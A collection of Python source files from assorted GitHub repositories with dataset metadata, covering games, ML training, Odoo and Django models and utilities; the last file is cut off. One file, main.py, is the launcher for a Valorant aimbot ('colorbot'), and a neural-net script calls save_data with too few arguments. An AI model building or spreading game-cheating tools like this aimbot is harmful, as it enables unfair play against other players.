-= ARCHER_DAMAGE\n if(archer.min_distance_object.hp<=0):\n archer.min_distance_object = None\n v1.archer_target_set(archer)\n \n for balloon in v1.balloons:\n if(balloon.hp<=0):\n continue\n if(balloon.min_distance_object==None):\n v1.balloon_target_set(balloon)\n if(balloon.target != (-1, -1)):\n v1.balloon_target_set(balloon)\n if(balloon.target[0]>0):\n v1.balloon_move(balloon, 1,0)\n balloon.target = (balloon.target[0]-1, balloon.target[1])\n elif(balloon.target[0]<0):\n v1.balloon_move(balloon, -1,0)\n balloon.target = (balloon.target[0]+1, balloon.target[1])\n elif(balloon.target[1]>0):\n v1.balloon_move(balloon, 0,1)\n balloon.target = (balloon.target[0], balloon.target[1]-1)\n elif(balloon.target[1]<0):\n v1.balloon_move(balloon, 0,-1)\n balloon.target = (balloon.target[0], balloon.target[1]+1)\n if(balloon.target==(0,0)):\n balloon.target = (-1, -1)\n v1.printVillage(t)\n \n elif(balloon.min_distance_object != None):\n balloon.min_distance_object.hp -= BALLOON_DAMAGE\n if(balloon.min_distance_object.hp<=0):\n balloon.min_distance_object = None\n v1.balloon_target_set(balloon)\n\n","repo_name":"benpaul2002/Clash_of_Clans","sub_path":"replay.py","file_name":"replay.py","file_ext":"py","file_size_in_byte":7586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12673111262","text":"import pygame\nimport random\n\n# initialize pygame\npygame.init()\n\n# game window\nWINDOW_WIDTH = 900\nWINDOW_HEIGHT = 700\nwindow = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n\n\n# colors\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nGREY = (128, 128, 128)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nCLEAR_BLUE = (52, 198, 235)\nASPHALT = (99, 96, 110)\nBEACH = (166, 144, 116)\n\n# player and player's movement speed\nPLAYER_WIDTH = 100\nPLAYER_HEIGHT = 100\nplayer_x = (WINDOW_WIDTH - PLAYER_WIDTH) // 2\nplayer_y = WINDOW_HEIGHT - PLAYER_HEIGHT - 10\nplayer_speed = 5\n\n# set up the font for displaying the score\nfont = pygame.font.SysFont(None, 30)\n\n# score\nscore = 0\n\n# obstacle and obstacle's movement speed\nobstacle_plane_width = 50\nobstacle_plane_height = 50\nobstacle_boat_width = obstacle_plane_width + 10\nobstacle_boat_height = obstacle_plane_height + 10\nobstacle_plane_x = random.randint(0, WINDOW_WIDTH - obstacle_plane_width)\nobstacle_plane_y = -obstacle_plane_height\nobstacle_boat_x = random.randint(0, WINDOW_WIDTH - obstacle_boat_width)\nobstacle_boat_y = -obstacle_boat_height\nobstacle_speed_y = 3\n\ngame_over = False","repo_name":"Viciiiz/plane-tower-game","sub_path":"my_vars/my_vars.py","file_name":"my_vars.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20231406010","text":"from typing import Iterable\n\nfrom santa_factory.dashboard import Dashboard\nfrom santa_factory.elf import Elf\nfrom santa_factory.elf_team import ElfTeam\nfrom santa_factory.garage import Garage\nfrom santa_factory.gift import GiftFactory\n\n\nclass SantaFactory:\n def __init__(self, gift_factory: GiftFactory, elves: Iterable[Elf],\n garage: Garage, dashboard: Dashboard):\n self.gift_factory = gift_factory\n self.garage = garage\n self.dashboard = dashboard\n self.elf_team = ElfTeam(elves)\n # Monitoring\n for elf in self.elf_team.elves:\n self.dashboard.monitor(elf)\n for sledge in self.garage.sledges:\n self.dashboard.monitor(sledge)\n\n async def run(self):\n \"\"\"Brings to life this little world\"\"\"\n self.dashboard.start()\n async for gift in self.gift_factory:\n await self.elf_team.handle_gift(gift, self.garage)\n","repo_name":"wyfo/santa_factory","sub_path":"santa_factory/santa_factory.py","file_name":"santa_factory.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15126488103","text":"import pyautogui, ctypes, os\nfrom colorbot import Colorbot\nfrom settings import Settings\n\nclass Main:\n def __init__(self):\n self.settings = Settings()\n self.monitor = pyautogui.size()\n self.CENTER_X, self.CENTER_Y = self.monitor.width // 2, self.monitor.height // 2\n self.XFOV = self.settings.get_int('AIMBOT', 'xFov')\n self.YFOV = self.settings.get_int('AIMBOT', 'yFov')\n self.Colorbot = Colorbot(self.CENTER_X - self.XFOV // 2, self.CENTER_Y - self.YFOV // 2, self.XFOV, self.YFOV)\n\n def better_cmd(self, width, height):\n hwnd = ctypes.windll.kernel32.GetConsoleWindow()\n if hwnd:\n style = ctypes.windll.user32.GetWindowLongW(hwnd, -16)\n style &= -262145\n style &= -65537\n ctypes.windll.user32.SetWindowLongW(hwnd, -16, style)\n STD_OUTPUT_HANDLE_ID = ctypes.c_ulong(4294967285)\n windll = ctypes.windll.kernel32\n handle = windll.GetStdHandle(STD_OUTPUT_HANDLE_ID)\n rect = ctypes.wintypes.SMALL_RECT(0, 0, width - 1, height - 1)\n windll.SetConsoleScreenBufferSize(handle, ctypes.wintypes._COORD(width, height))\n windll.SetConsoleWindowInfo(handle, ctypes.c_int(True), ctypes.pointer(rect))\n\n def info(self):\n os.system('cls')\n print('github.com/kaanosu/ValorantArduinoColorbot\\n')\n print('Enemy Outline Color: Purple')\n\n def run(self):\n self.better_cmd(120, 30)\n self.info()\n self.Colorbot.listen()\n\nif __name__ == '__main__':\n Main().run()","repo_name":"kaanosu/ValorantArduinoColorbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"33343493598","text":"from collections import OrderedDict, defaultdict\nfrom typing import List\n\nfrom deeplake.util.hash import hash_str_to_int32\nfrom deeplake.util.exceptions import EmptyTensorError\nfrom deeplake.client.log import logger\nimport numpy as np\nimport deeplake\n\n\ndef convert_to_idx(samples, class_names: List[str]):\n class_idx = {class_names[i]: i for i in range(len(class_names))}\n\n def convert(samples):\n idxs = []\n additions = []\n for sample in samples:\n if isinstance(sample, np.ndarray):\n sample = sample.tolist()\n if isinstance(sample, str):\n idx = class_idx.get(sample)\n if idx is None:\n idx = len(class_idx)\n class_idx[sample] = idx\n additions.append((sample, idx))\n idxs.append(idx)\n elif isinstance(sample, list):\n idxs_, additions_ = convert(sample)\n idxs.append(idxs_)\n additions.extend(additions_)\n else:\n idxs.append(sample)\n return idxs, additions\n\n return convert(samples)\n\n\ndef convert_to_hash(samples, hash_label_map):\n if isinstance(samples, np.ndarray):\n samples = samples.tolist()\n if isinstance(samples, list):\n return [convert_to_hash(sample, hash_label_map) for sample in samples]\n else:\n if isinstance(samples, str):\n hash_ = hash_str_to_int32(samples)\n hash_label_map[hash_] = samples\n else:\n hash_ = samples\n return hash_\n\n\ndef convert_hash_to_idx(hashes, hash_idx_map):\n if isinstance(hashes, list):\n return [convert_hash_to_idx(hash, hash_idx_map) for hash in hashes]\n else:\n try:\n return hash_idx_map[hashes]\n except KeyError:\n return hashes\n\n\ndef convert_to_text(inp, class_names: List[str], return_original=False):\n if isinstance(inp, np.integer):\n idx = int(inp)\n if idx < len(class_names):\n return class_names[idx]\n return idx if return_original else None\n return [convert_to_text(item, class_names) for item in inp]\n\n\ndef sync_labels(\n ds, label_temp_tensors, hash_label_maps, num_workers, scheduler, verbose=True\n):\n ds = ds.root\n hl_maps = defaultdict(OrderedDict)\n for map in hash_label_maps:\n for tensor in map:\n hl_maps[tensor].update(map[tensor])\n hash_label_maps = hl_maps\n\n @deeplake.compute\n def class_label_sync(\n hash_tensor_sample,\n samples_out,\n label_tensor: str,\n hash_idx_map,\n ):\n try:\n hashes = hash_tensor_sample.numpy().tolist()\n idxs = convert_hash_to_idx(hashes, hash_idx_map)\n except EmptyTensorError:\n idxs = None\n samples_out[label_tensor].append(idxs)\n\n for tensor, temp_tensor in label_temp_tensors.items():\n if len(ds[temp_tensor]) == 0:\n ds.delete_tensor(temp_tensor, large_ok=True)\n else:\n try:\n target_tensor = ds[tensor]\n hash_label_map = hash_label_maps[temp_tensor]\n class_names = target_tensor.info.class_names\n new_labels = [\n label\n for label in hash_label_map.values()\n if label not in class_names\n ]\n if verbose:\n N = len(class_names)\n for i in range(len(new_labels)):\n logger.info(\n f\"'{new_labels[i]}' added to {tensor}.info.class_names at index {N + i}\"\n )\n class_names.extend(new_labels)\n label_idx_map = {class_names[i]: i for i in range(len(class_names))}\n hash_idx_map = {\n hash: label_idx_map[hash_label_map[hash]] for hash in hash_label_map\n }\n target_tensor.info.is_dirty = True\n target_tensor.meta._disable_temp_transform = True\n target_tensor.meta.is_dirty = True\n\n logger.info(\"Synchronizing class labels...\")\n class_label_sync(label_tensor=tensor, hash_idx_map=hash_idx_map).eval(\n ds[temp_tensor],\n ds,\n progressbar=True,\n check_lengths=False,\n skip_ok=True,\n )\n target_tensor.meta._disable_temp_transform = False\n finally:\n ds.delete_tensor(temp_tensor, large_ok=True)\n","repo_name":"activeloopai/deeplake","sub_path":"deeplake/util/class_label.py","file_name":"class_label.py","file_ext":"py","file_size_in_byte":4597,"program_lang":"python","lang":"en","doc_type":"code","stars":7141,"dataset":"github-code","pt":"81"} +{"seq_id":"27211999135","text":"import numpy as np\nimport pandas as pd\nimport pickle\nimport datetime\nimport os\n\nEPOCHS = 30\nLEARNING_RATE = 0.00003\nLAYERS = [784, 30, 10]\n\nLOAD_WEIGHTS = False\n\nSAVE_NAME = '3_layers'\n\n# A function that loads mnist data into a pandas dataframe\ndef load_mnist_data():\n # Load the data\n train = pd.read_csv('data/mnist_train.csv')\n test = pd.read_csv('data/mnist_test.csv')\n\n # Shuffle the data\n train = train.sample(frac=1).reset_index(drop=True)\n test = test.sample(frac=1).reset_index(drop=True)\n\n # Split the data into X and y for train, test and validation\n X_train = train.drop('label', axis=1).to_numpy()\n y_train = train['label'].to_numpy()\n\n X_test = test.drop('label', axis=1)\n y_test = test['label']\n\n X_val = X_test[:5000].to_numpy()\n y_val = y_test[:5000].to_numpy()\n\n X_test = X_test[5000:].to_numpy()\n y_test = y_test[5000:].to_numpy()\n\n # Return the data\n return (X_train, y_train), (X_test, y_test), (X_val, y_val)\n\nclass NeuralNetwork:\n def __init__(self, layers, learning_rate=0.01):\n self.layers = layers\n self.learning_rate = learning_rate\n\n self.weights, self.biases = self.initialize_weights()\n\n def initialize_weights(self):\n weights = []\n biases = []\n \n # Randomly initialize the weights\n # We use a normal distribution with mean 0 and standard deviation 1\n for i in range(len(self.layers) - 1):\n input_size = self.layers[i]\n output_size = self.layers[i + 1]\n\n # Adding weighs and biases for the current layer\n biases.append(np.random.normal(loc = 0, scale = 1.0, size = (1, output_size)))\n weights.append(np.random.normal(loc = 0, scale = 1.0, size = (input_size, output_size)))\n\n return weights, biases\n\n # Takes the input X and returns the output of the network\n # Forward pass uses ReLU on all layers except the last one, which uses softmax\n # Input: (batch_size, 784)\n def forward(self, X : np.ndarray, return_layer_activations : bool = False) -> np.ndarray:\n # Reshaping if there is no batch dimension\n if len(X.shape) == 1:\n X = X.reshape(1, -1)\n\n if X.shape[1] != 784:\n raise ValueError('The input must be of shape (batch_size, 784)')\n if len(X.shape) != 2:\n raise ValueError('The input must be of shape (batch_size, 784) or (784)')\n \n # Returning layer activations if requested. Used in backpropagation typically\n if return_layer_activations: \n layer_activations = []\n \n # Forward pass\n for i in range(len(self.layers) - 1):\n if return_layer_activations: layer_activations.append(X)\n\n X = np.dot(X, self.weights[i]) + self.biases[i]\n\n # TODO: Implement dropout during training\n\n # ReLU for all layers except the last one\n if i != len(self.layers) - 2:\n # Normalize the data\n mean = np.array(np.mean(X, axis = 1)).reshape(-1, 1)\n std = np.array(np.std(X, axis = 1)).reshape(-1, 1)\n normalized_X = np.divide(np.subtract(X, mean), std)\n\n # ReLU\n X = np.maximum(normalized_X, 0)\n else: # Softmax for the last layer\n X = self.__softmax(X)\n\n # Return the layer activations if requested\n if return_layer_activations:\n return X, layer_activations\n \n return X\n\n # Takes the input X and the target y, and returns\n # the loss and the gradient of the loss with respect to the weights\n def backward(self, X : np.ndarray, y : np.ndarray) -> tuple[np.ndarray, float]:\n pred, layer_activations = self.forward(X, return_layer_activations = True)\n \n # Calculate the loss\n loss = self.__cross_entropy_loss(pred, y)\n\n weight_gradients = []\n bias_gradients = []\n\n for layer_num in range(len(self.weights) - 1, -1, -1):\n # dL/dW = dL/dA * dA/dZ * dZ/dW\n\n prev_activation = layer_activations[layer_num]\n\n # Final Layer\n if layer_num == len(self.weights) - 1:\n # Change in loss as a function of the weights and biases\n ground_truth = self.__labels_to_one_hot(y)\n activation_j = np.expand_dims(np.transpose(np.squeeze(prev_activation, axis = 0)), axis = 1)\n delta_k = pred - ground_truth\n\n dL_dW = np.matmul(activation_j, delta_k)\n dL_db = delta_k\n else: # Hidden Layers\n # Change in loss as a function of the weights and biases\n a_i = prev_activation\n relu_prime = self.__calculate_relu_derivative(layer_activations[layer_num + 1])\n # dL/dy = sum(dL(j)/dz(j) * W(j+1)) \n W_j_plus_1 = self.weights[layer_num + 1]\n dL_j_dz_j = np.matmul(weight_gradients[-1].transpose(), relu_prime.transpose())\n dL_dy = np.matmul(W_j_plus_1, dL_j_dz_j)\n\n dL_dW = np.matmul(np.transpose(a_i), relu_prime) * np.sum(dL_dy, axis = 1)\n dL_db = relu_prime * np.sum(dL_dy, axis = 1)\n\n weight_gradients.append(dL_dW)\n bias_gradients.append(dL_db)\n \n # Reverse the gradients to match the order of the weights and biases\n weight_gradients = weight_gradients[::-1]\n bias_gradients = bias_gradients[::-1]\n\n # Preform gradient clipping to prevent exploding gradients\n weight_gradients = [np.clip(weight_gradient, -1, 1) for weight_gradient in weight_gradients]\n bias_gradients = [np.clip(bias_gradient, -1, 1) for bias_gradient in bias_gradients]\n\n return loss, (weight_gradients, bias_gradients)\n\n ###########\n # Helpers #\n ###########\n\n def __softmax(self, X : np.ndarray) -> np.ndarray:\n return np.exp(X) / np.sum(np.exp(X), axis=1, keepdims=True)\n \n # Cross entropy loss\n def __cross_entropy_loss(self, pred : np.ndarray, y : np.ndarray) -> float:\n if len(y.shape) == 0:\n true_class_prob = np.zeros(shape = (1, 10))\n true_class_prob[0, y] = 1\n else:\n true_class_prob = np.zeros(shape = (y.shape[0], 10))\n true_class_prob[np.arange(y.size), y] = 1\n\n return -np.sum(np.log(pred) * true_class_prob) / true_class_prob.shape[0]\n \n # Derivative of the softmax function\n def __calculate_softmax_derivatve(self, X : np.ndarray) -> np.ndarray:\n softmax_out = self.__softmax(X)\n return softmax_out / (1.0 - softmax_out)\n\n # Derivative of the ReLU function\n def __calculate_relu_derivative(self, X : np.ndarray) -> np.ndarray:\n return np.where(X > 0, 1, 0)\n\n # Derivative of the cross entropy function\n def __calculate_cross_entropy_derivative(self, pred : np.ndarray, y : np.ndarray) -> np.ndarray:\n true_class_prob = self.__labels_to_one_hot(y)\n\n return -true_class_prob / pred\n \n def __labels_to_one_hot(self, y : np.ndarray) -> np.ndarray:\n if len(y.shape) == 0:\n one_hot = np.zeros(shape = (1, 10))\n one_hot[0, y] = 1\n else:\n one_hot = np.zeros(shape = (y.shape[0], 10))\n one_hot[np.arange(y.size), y] = 1\n\n return one_hot\n\ndef train(net : NeuralNetwork, train_data : np.ndarray, val_data : np.ndarray, epochs=10):\n X_train, y_train = train_data\n X_val, y_val = val_data\n\n avg_train_losses = []\n avg_val_losses = []\n\n avg_train_accuracies = []\n avg_val_accuracies = []\n\n # For each epoch\n for epoch in range(1, epochs + 1):\n\n avg_val_loss = get_validation_loss(net, X_val, y_val)\n avg_val_losses.append(avg_val_loss)\n\n val_accuracy = eval(net, val_data)\n avg_val_accuracies.append(val_accuracy)\n\n losses = []\n\n # For each example in the training set\n for i in range(X_train.shape[0]):\n X_batch = np.array(X_train[i])\n y_batch = np.array(y_train[i])\n\n loss, (weight_grad, bias_grad) = net.backward(X_batch, y_batch)\n\n losses.append(loss)\n\n # Updating the weights and biases\n for i in range(len(net.weights)):\n net.weights[i] -= LEARNING_RATE * weight_grad[i]\n net.biases[i] -= LEARNING_RATE * bias_grad[i]\n\n avg_loss = np.mean(losses)\n avg_train_losses.append(avg_loss)\n\n train_accuracy = eval(net, train_data)\n avg_train_accuracies.append(train_accuracy)\n\n print(epoch, avg_loss, avg_val_loss, train_accuracy, val_accuracy)\n\n if epoch % 5 == 0 and epoch != 0:\n save_data(net, avg_train_losses, avg_val_losses)\n\n return net, avg_train_losses, avg_val_losses, avg_train_accuracies, avg_val_accuracies\n\ndef get_validation_loss(net : NeuralNetwork, X_val : np.ndarray, y_val : np.ndarray) -> float:\n losses = []\n\n for i in range(X_val.shape[0]):\n X_batch = np.array(X_val[i])\n y_batch = np.array(y_val[i])\n\n loss, _ = net.backward(X_batch, y_batch)\n losses.append(loss)\n\n return np.mean(losses)\n\n\ndef eval(net : NeuralNetwork, test_data : np.ndarray):\n X_test, y_test = test_data\n\n correct_guesses = 0\n\n for i in range(X_test.shape[0]):\n X_batch = np.array(X_test[i])\n y_batch = np.array(y_test[i])\n\n pred_vector = net.forward(X_batch)\n prediction = pred_vector.argmax()\n\n #print('Prediction:', prediction, 'Actual: ', y_batch)\n\n if prediction == y_batch:\n correct_guesses += 1\n\n return float(correct_guesses) / float(X_test.shape[0])\n\ndef save_data(net, avg_train_losses, avg_val_losses, avg_train_accuracies, avg_val_accuracies):\n # Creating a method for saving everything\n # Create a directory for the current run\n run_dir = os.path.join(\"saves\", SAVE_NAME + '_' + start_date_time)\n os.makedirs(run_dir)\n\n # Saving the weights and biases\n with open(os.path.join(run_dir, 'weights.pkl'), 'wb') as f:\n pickle.dump(net.weights, f)\n pickle.dump(net.biases, f)\n\n # Saving the losses in a pandas csv\n df = pd.DataFrame({'train_loss': avg_train_losses, 'val_loss': avg_val_losses, 'train_accuracy': avg_train_accuracies, 'val_accuracy': avg_val_accuracies})\n df.to_csv(os.path.join(run_dir, 'losses.csv'), index=False)\n\ndef main():\n global start_date_time\n start_date_time = str(datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S'))\n\n train_data, test_data, val_data = load_mnist_data()\n\n net = NeuralNetwork(layers = LAYERS)\n\n # Loading saved weights and biases\n if LOAD_WEIGHTS:\n with open('weights.pkl', 'rb') as f:\n weights = pickle.load(f)\n biases = pickle.load(f)\n net.weights = weights\n net.biases = biases\n\n net, avg_train_losses, avg_val_losses, avg_train_accuracies, avg_val_accuracies = train(net, train_data, val_data, epochs = EPOCHS)\n\n save_data(net, avg_train_losses, avg_val_losses)\n\n accuracy_on_test = eval(net, test_data)\n print('Accuracy: ', accuracy_on_test)\n\n'''\nEpoch Train Loss and Val loss of 20 epochs\n1 1.8910248125755844 0.9066598151773069\n2 0.7853883801136732 0.705261561068248\n3 0.6955340516656342 0.6693685850868711\n4 0.6822431915452479 0.6796129016275548\n5 0.7173728657741884 0.747428342082974\n6 0.8274607238245256 0.907169095318536\n7 1.0052239265308296 1.0880439811614062\n8 1.1613310888744866 1.2230937263566783\n9 1.284066508283541 1.338250384763169\n10 1.3958711280865803 1.4437385398300528\n11 1.494520786077842 1.534511693267978\n12 1.5771848213769906 1.6089244242025091\n13 1.6441051550342975 1.6690671529427084\n14 1.6992237664247059 1.718997491143662\n15 1.7443720205997044 1.7595907995988858\n16 1.7818428704069464 1.7945413506939825\n17 1.8148602666607832 1.8261337171909462\n18 1.8453701248460639 1.855368090920725\n19 1.873594312775242 1.8826773416419804\n20 1.9004549753505733 1.9088665722050886\n'''\n\nif __name__ == '__main__':\n main()","repo_name":"nvinden/neural_net_from_scratch","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":12043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30516424724","text":"import pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\n\r\ndata = pd.read_csv('diabetes.csv')\r\n\r\n##### Data Cleaning #####\r\n\r\n# In the dataset we are working with, missing data is represented by 0s\r\n# This function replaces missing values in a column with the mean of the non-zero values in the column\r\n# Parameters: columnName, string - the header of the column\r\n# Returns: nothing\r\ndef cleanColumn(columnName):\r\n # Set all 0 entries to pd.NA so we can use pd.df.fillna to quickly replace the missing values\r\n for row in data.index:\r\n if data.loc[row, columnName] == 0:\r\n data.loc[row, columnName] = pd.NA\r\n \r\n data[columnName].fillna(data[columnName].mean(skipna=True), inplace=True)\r\n\r\ncolumnsToClean = {'Glucose', 'BloodPressure', 'SkinThickness', 'Insulin', 'BMI'}\r\n\r\nfor columnName in columnsToClean:\r\n cleanColumn(columnName)\r\n\r\n##### Normalising Data #####\r\n\r\n# Applies Gaussian normalisation to columns\r\n# Parameters: columnName, string - the header of the column\r\n# Returns: nothing\r\ndef normaliseColumn(columnName):\r\n data[columnName] = (data[columnName]-data[columnName].mean())/data[columnName].std()\r\n\r\n# Only the feature columns are normalised, the class labels are left as either 1s or 0s\r\nfor columnName in {'Pregnancies','Glucose','BloodPressure','SkinThickness','Insulin','BMI','DiabetesPedigreeFunction','Age'}:\r\n normaliseColumn(columnName)\r\n\r\n##### Test-Train Splitting #####\r\n \r\n# stratify=data['Outcome'] maintains relative frequencies of classes in the train and test data\r\ntrainInstances, testInstances = train_test_split(data, test_size=0.2, shuffle=True, stratify=data['Outcome'])\r\n\r\n# index=False stops a column of row indices from being written to the .csv file\r\ntrainInstances.to_csv('train.csv', index=False)\r\ntestInstances.to_csv('test.csv', index=False)\r\n","repo_name":"UntitledGrub/classifercomp","sub_path":"dataPreparation.py","file_name":"dataPreparation.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20786764758","text":"class RangeDown:\n \"\"\"Iterator from max down to min (both inclusive)\"\"\"\n\n def __init__(self, min1, max1):\n self.current = max1 + 1\n self.min = min1\n\n def __iter__(self):\n return self\n\n def __next__(self):\n self.current -= 1\n if self.current < self.min:\n raise StopIteration\n else:\n return self.current\n\n\nif __name__ == '__main__':\n # Use iter() and next()\n itr = iter(RangeDown(6, 8)) # self.min = 6, self.current = 9 --> b\n\n print(next(itr)) # 8\n print(next(itr)) # 7\n print(next(itr)) # 6\n # print(next(itr)) # StopIteration\n\n # Iterate in for-in loop\n for i in RangeDown(6, 8):\n print(i, end=\" \") # 8 7 6\n print()\n\n # Use __iter__() and __next__()\n itr2 = RangeDown(9, 10).__iter__()\n print(itr2.__next__()) # 10\n print(itr2.__next__()) # 9\n print(itr2.__next__()) # StopIteration","repo_name":"ramanamiracle/PythonTraining","sub_path":"iter_gen_context/itr.py","file_name":"itr.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"10755501726","text":"from odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\n\n\nclass SaleOrder(models.Model):\n _inherit = \"sale.order\"\n\n credit_limit_checked = fields.Boolean(\"Credit Limit Checked\", default=False)\n\n @api.multi\n def action_confirm(self):\n invoice_total = 0\n payment_total = 0\n exceed_amount = 0\n if self.partner_id.credit_limit_applicable:\n delivered_quantity = all(line.product_id.invoice_policy == 'delivery' for line in self.order_line)\n customer_inv = self.env[\"account.invoice\"].search([('partner_id','=', self.partner_id.id), ('state','not in',['draft','cancel']),('type', '=','out_invoice')])\n for inv in customer_inv:\n invoice_total+= inv.amount_total\n customer_payment = self.env[\"account.payment\"].search([('partner_id','=', self.partner_id.id), ('payment_type', '=','inbound'),('state','in',['posted','reconciled'])])\n for pay in customer_payment:\n payment_total+= pay.amount\n if payment_total > invoice_total:\n print (\"else\")\n elif invoice_total > payment_total:\n exceed_amount = (invoice_total + self.amount_total) - payment_total\n if delivered_quantity:\n if exceed_amount > self.partner_id.credit_limit:\n if self.credit_limit_checked == False:\n return {\n \"type\": \"ir.actions.act_window\",\n \"res_model\": \"credit.limit.warning\",\n \"views\": [[False, \"form\"]],\n \"target\": \"new\",\n }\n elif self.credit_limit_checked == True:\n self._action_confirm()\n if self.env['ir.config_parameter'].sudo().get_param('sale.auto_done_setting'):\n self.action_done()\n elif exceed_amount < self.partner_id.credit_limit:\n self._action_confirm()\n if self.env['ir.config_parameter'].sudo().get_param('sale.auto_done_setting'):\n self.action_done()\n else:\n raise UserError(_('Select all products with Delivered quantities Invoicing policy'))\n else:\n self._action_confirm()\n if self.env['ir.config_parameter'].sudo().get_param('sale.auto_done_setting'):\n self.action_done()\n return True\n","repo_name":"ItaraTeam0215674595252522566/Team-project","sub_path":"models/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"25485866402","text":"from django.db import models\nfrom faker import Faker\n\nfrom groups.models import Group\nfrom .validators import unique_number\n\n\nclass Teachers(models.Model):\n first_name = models.CharField(max_length=30)\n last_name = models.CharField(max_length=30)\n age = models.IntegerField()\n phone_number = models.CharField(\n max_length=20,\n validators=[unique_number]\n )\n group = models.ForeignKey(\n Group,\n on_delete=models.SET_NULL,\n null=True,\n related_name='teachers'\n )\n\n def __str__(self):\n return f'{self.first_name} {self.last_name} age: {self.age} phone number: {self.phone_number}'\n\n @staticmethod\n def gen_teachers(count):\n fake = Faker()\n for _ in range(count):\n teach = Teachers(first_name=fake.first_name(),\n last_name=fake.last_name(), age=fake.pyint(25, 75))\n teach.save()\n","repo_name":"ZemiosLemon/django_lms","sub_path":"teachers/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25519408098","text":"from PyInquirer import prompt\n\nquestions = [\n {\n 'type': 'list',\n 'name': 'opciones',\n 'message': 'Que deseas ?',\n 'choices': [\n 'Opcion 1',\n 'Opcion 2',\n 'Opcion 3',\n 'Opcion 4',\n 'Opcion 5',\n 'Opcion 6'\n ]\n }\n]\n\nanswers = prompt(questions)\nprint(answers)","repo_name":"wlizama/python-training","sub_path":"terminal_ui/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36605242419","text":"# Import the necessary libraries\nimport os # Provides functions for interacting with the operating system\nimport re # Provides regular expression matching operations\nimport json # Used for JSON manipulation\nimport mysql.connector # Provides methods to connect to a MySQL database\n\nclass TextFileProcessor:\n \"\"\"\n This class is used to process text files. It provides methods to read and clean files as well as\n inserting and updating records in a MySQL database.\n \"\"\"\n\n def __init__(self, config_file, max_files=None):\n \"\"\"\n Constructor for the 'TextFileProcessor' class.\n\n :param config_file: A string representing the path to the JSON file containing the database configuration.\n :param max_files: An integer representing the maximum number of files to process.\n \"\"\"\n # Open and load the configuration file\n with open(config_file) as f:\n self.config = json.load(f)\n\n # Connect to the MySQL database\n self.connect_to_db()\n\n # Set the source and destination folders from the configuration file\n self.source_folder = self.config['folders']['source']\n self.dest_folder = self.config['folders']['destination']\n\n # Set the maximum number of files to process\n self.max_files = max_files\n\n def connect_to_db(self):\n \"\"\"\n This method connects to a MySQL database using the configuration settings loaded from the configuration file.\n \"\"\"\n try:\n self.mydb = mysql.connector.connect(\n host=self.config['db']['host'],\n user=self.config['db']['user'],\n password=self.config['db']['password'],\n database=self.config['db']['name']\n )\n\n # Create a cursor for executing SQL commands\n self.cursor = self.mydb.cursor()\n\n except mysql.connector.Error as err:\n print(f\"Error connecting to the database: {err}\")\n raise SystemExit\n\n def process_files(self):\n \"\"\"\n This method processes all files in the source folder.\n \"\"\"\n # Get a list of all files in the source folder\n file_list = os.listdir(self.source_folder)\n\n if file_list:\n total_files = len(file_list)\n\n # Iterate over all files in the source folder\n for count, file in enumerate(file_list, start=1):\n # If the number of processed files is greater than the maximum, stop processing\n if self.max_files and count > self.max_files:\n print(f\"Reached limit of {self.max_files} files\")\n break\n\n print(f\"Starting: {file}\\n\")\n\n # Generate the full path of the file\n file_path = os.path.join(self.source_folder, file)\n\n # Extract metadata from the filename\n source_id, id, page_num = self.extract_metadata_from_filename(file)\n\n # Extract data from the file\n title, text, created_date = self.extract_data_from_file(file_path)\n\n # Clean the extracted text\n text = self.clean_data(text)\n\n # Write the cleaned text to a new file\n self.write_cleaned_file(file, text)\n\n # Prepare the data for insertion or update\n data = {\n 'source_id': source_id,\n 'id': id,\n 'page_num': page_num,\n 'title': title,\n 'text': text,\n 'created_date': created_date\n }\n\n # Insert or update the record in the database\n self.insert_or_update_record(data)\n\n print(f\"Finished processing file {count} of {total_files}\\n\")\n\n else:\n print(\"No files found in the source directory.\")\n\n # Close the database connection after all files have been processed\n self.close_db_connection()\n\n def extract_metadata_from_filename(self, file):\n \"\"\"\n This method extracts metadata from a filename. It expects filenames in the format \"source_id-id-page_num.txt\".\n\n :param file: A string representing the filename to extract metadata from.\n :returns: A tuple containing the source_id, id, and page_num extracted from the filename.\n \"\"\"\n match = re.match(r'(\\d+)-(\\d+)-(\\d+)\\.txt$', file)\n\n if not match:\n print(f\"Filename '{file}' does not match expected format 'source_id-id-page_num.txt'. Skipping file.\")\n return None, None, None\n\n return match.groups()\n\n def extract_data_from_file(self, file_path):\n \"\"\"\n This method extracts data from a file. It expects files where the first line is the title\n and the last line is the created date.\n\n :param file_path: A string representing the full path of the file to extract data from.\n :returns: A tuple containing the title, raw text, and created date.\n \"\"\"\n try:\n # Open and read the file\n with open(file_path) as f:\n text = f.read()\n\n except Exception as e:\n print(f\"Could not read file {file_path}. Error: {str(e)}\")\n return None, None, None\n\n # Extract the title and date from the text\n title, created_date = 